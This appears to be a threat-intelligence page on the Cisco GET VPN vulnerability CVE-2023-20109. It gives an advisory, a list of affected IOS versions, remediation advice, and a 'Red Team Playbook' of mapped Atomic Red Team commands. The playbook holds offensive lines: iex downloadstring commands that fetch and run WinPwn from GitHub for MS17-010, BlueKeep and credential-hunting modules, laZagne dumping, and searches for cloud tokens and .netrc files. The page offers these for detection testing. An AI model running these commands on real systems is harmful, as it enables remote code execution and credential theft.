CVE-2023-20109
Overview
This vulnerability is a memory corruption issue caused by improper validation of attributes within the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols in Cisco's Group Encrypted Transport VPN (GET VPN) feature. Specifically, the flaw arises from insufficient checks on protocol attributes exchanged between group members and key servers. The affected components are the GET VPN feature implementations in Cisco IOS and IOS XE Software versions.
Vulnerability Description
A vulnerability in the Cisco Group Encrypted Transport VPN (GET VPN) feature of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker who has administrative control of either a group member or a key server to execute arbitrary code on an affected device or cause the device to crash. This vulnerability is due to insufficient validation of attributes in the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols of the GET VPN feature. An attacker could exploit this vulnerability by either compromising an installed key server or modifying the configuration of a group member to point to a key server that is controlled by the attacker. A successful exploit could allow the attacker to execute arbitrary code and gain full control of the affected system or cause the affected system to reload, resulting in a denial of service (DoS) condition. For more information, see the Details ["#details"] section of this advisory.
Impact
An attacker with administrative privileges on a group member or key server can execute arbitrary code on affected devices or cause them to crash, resulting in a denial of service. This enables full system compromise, including control over VPN encryption keys and potentially lateral movement within the network. The prerequisite is possession of administrative access to either a group member or key server, which may be obtained through credential compromise or insider threat. The business impact includes disruption of secure communications and potential exposure of sensitive data.
Solution
Cisco has released security updates addressing this vulnerability in affected IOS and IOS XE versions. Administrators should refer to the Cisco Security Advisory at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-getvpn-rce-g8qR68sx for detailed patch instructions. Upgrading to fixed software versions as specified in the advisory is the recommended remediation. No specific workarounds are provided; timely application of vendor patches is essential.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A vulnerability exists within the Group Encrypted Transport VPN (GET VPN) feature of Cisco IOS and Cisco IOS XE Software, primarily stemming from inadequate validation of attributes in the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols. This flaw allows an authenticated remote attacker, who has administrative control over either a group member or a key server, to execute arbitrary code on the affected device or induce a crash. The implications of this vulnerability are significant, as it can lead to unauthorized access, data breaches, and potential denial of service (DoS) conditions, thereby compromising the integrity and availability of network resources.
The attack vectors for this vulnerability are particularly concerning. An attacker can exploit the weakness by either compromising an existing key server or manipulating the configuration of a group member to redirect it to a key server under their control. Once an attacker gains access, they can execute arbitrary code, leading to full control over the affected system. This could allow for the installation of malware, interception of sensitive data, or even the manipulation of network traffic, which could have far-reaching consequences for organizations relying on secure communications.
The real-world impact of this vulnerability is profound, particularly for organizations that utilize Cisco's networking solutions for critical operations. The potential for unauthorized access to sensitive data can result in significant financial losses, reputational damage, and legal ramifications. Businesses may face regulatory scrutiny and compliance issues, especially if sensitive customer information is compromised. Additionally, the downtime caused by a successful exploit could disrupt operations, leading to further financial losses and diminished customer trust.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching Cisco IOS and IOS XE Software is crucial to ensure that known vulnerabilities are addressed promptly. Network monitoring tools can be employed to detect unusual activities or configurations that may indicate an attempted exploit. Furthermore, organizations should enforce strict access controls to limit administrative privileges and ensure that only authorized personnel can modify configurations related to the GET VPN feature. Conducting regular security audits and penetration testing can also help identify potential weaknesses before they can be exploited.
In conclusion, the vulnerability within the GET VPN feature of Cisco's software presents a serious threat to network security. The potential for arbitrary code execution and system crashes poses significant risks to organizations, making it imperative for cybersecurity professionals to prioritize detection and mitigation strategies. By adopting a proactive approach to security, organizations can safeguard their networks against this and similar vulnerabilities, ensuring the integrity and confidentiality of their data.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-20109, with telemetry indicating a significant uptick in attempts to exploit the vulnerability within Cisco’s GET VPN feature. Although no new exploit techniques or ransomware affiliations have emerged, the increase in detection frequency signals growing interest or reconnaissance efforts by threat actors targeting this medium-severity flaw. This trend underscores the potential for more widespread exploitation attempts, particularly given the vulnerability’s capacity for arbitrary code execution and device crashes when leveraged by an authenticated attacker with administrative privileges. While the EPSS score remains low and stable, the surge in observed activity elevates the operational risk profile, suggesting defenders should maintain heightened vigilance. The evolving exploitation landscape, as reflected in our sensors, indicates that adversaries may be probing for opportunities to weaponize this vulnerability, which could lead to more impactful incidents if left unaddressed.
Affected Products (1038)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios | 12.4\(22\)md |
cpe:2.3:o:cisco:ios:12.4\(22\)md:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)md1 |
cpe:2.3:o:cisco:ios:12.4\(22\)md1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)md2 |
cpe:2.3:o:cisco:ios:12.4\(22\)md2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda |
cpe:2.3:o:cisco:ios:12.4\(22\)mda:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda1 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda2 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda3 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda4 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda5 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda5:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)mda6 |
cpe:2.3:o:cisco:ios:12.4\(22\)mda6:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t |
cpe:2.3:o:cisco:ios:12.4\(22\)t:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t1 |
cpe:2.3:o:cisco:ios:12.4\(22\)t1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t2 |
cpe:2.3:o:cisco:ios:12.4\(22\)t2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t3 |
cpe:2.3:o:cisco:ios:12.4\(22\)t3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t4 |
cpe:2.3:o:cisco:ios:12.4\(22\)t4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)t5 |
cpe:2.3:o:cisco:ios:12.4\(22\)t5:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)xr1 |
cpe:2.3:o:cisco:ios:12.4\(22\)xr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)xr2 |
cpe:2.3:o:cisco:ios:12.4\(22\)xr2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)xr3 |
cpe:2.3:o:cisco:ios:12.4\(22\)xr3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios | 12.4\(22\)xr4 |
cpe:2.3:o:cisco:ios:12.4\(22\)xr4:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20109 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-getvpn-rce-g8qR68sx |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-20109 |